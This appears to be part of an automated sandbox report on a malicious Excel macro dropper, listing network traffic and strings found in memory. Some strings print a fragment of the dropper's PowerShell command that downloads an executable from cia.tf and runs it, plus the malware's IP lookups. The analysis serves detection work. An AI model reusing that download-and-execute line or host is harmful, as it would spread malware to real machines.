Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443

Networking

Source: Yara match

File source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: global traffic

HTTP traffic detected: GET /2ed7362e959d42385d4e6d231a6840dd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: cia.tfConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.1.182:443 -> 192.168.2.22:49163 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CD0796D.png

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /2ed7362e959d42385d4e6d231a6840dd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: cia.tfConnection: Keep-Alive

Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: cia.tf

Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: tmp7752.exe, 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: powershell.exe, 00000002.00000002.415420212.0000000003F77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cia.tf
Source: powershell.exe, 00000002.00000002.425832716.000000001C1DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425256294.000000001AB43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425256294.000000001AB43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000002.00000002.425832716.000000001C1CD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000002.00000002.425832716.000000001C18C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: powershell.exe, 00000002.00000002.415420212.00000000037E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000002.00000002.423968038.00000000123F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.00000000025CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000002.00000002.425256294.000000001AB43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000002.00000002.425832716.000000001C1CD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425256294.000000001AB43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://ocsps.ssl.com0
Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://ocsps.ssl.com0?
Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://ocsps.ssl.com0_
Source: powershell.exe, 00000002.00000002.415420212.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.489076925.0000000002882000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.000000000266B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425256294.000000001AB43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: powershell.exe, 00000002.00000002.415420212.0000000003FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: powershell.exe, 00000002.00000002.415420212.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf
Source: vbaProject.bin	String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe
Source: powershell.exe, 00000002.00000002.425256294.000000001AB15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415390039.0000000001BE6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425588760.000000001AF66000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415315754.0000000000204000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.425832716.000000001C227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;
Source: powershell.exe, 00000002.00000002.415334171.00000000002CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;z
Source: powershell.exe, 00000002.00000002.415334171.00000000002CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exed
Source: vbaProject.bin	String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840ddB.
Source: powershell.exe, 00000002.00000002.415420212.00000000025CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.415420212.00000000025CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.415420212.00000000025CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000002.00000002.423968038.00000000123F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.415420212.00000000025CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: tmp7752.exe, 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
